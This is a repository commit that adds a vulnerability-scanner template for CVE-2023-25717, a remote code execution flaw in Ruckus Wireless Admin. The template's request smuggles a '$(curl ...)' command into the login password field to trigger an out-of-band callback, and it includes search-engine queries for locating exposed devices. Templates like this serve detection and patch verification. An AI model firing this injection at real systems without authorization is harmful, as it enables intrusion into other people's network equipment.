Create CVE-2023-25717.yaml
parent
aab5f830ae
commit
0450d1224f
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-25717
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
|
||||||
|
author: parthmalhotra, pdresearch
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
|
||||||
|
reference:
|
||||||
|
- https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
|
||||||
|
- https://support.ruckuswireless.com/security_bulletins/315
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-25717
|
||||||
|
cwe-id: CWE-94
|
||||||
|
epss-score: 0.00671
|
||||||
|
cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"ruckus wireless"
|
||||||
|
fofa-query: title="ruckus wireless"
|
||||||
|
tags: cve,cve2023,ruckuswireless,trending
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
Loading…
Reference in New Issue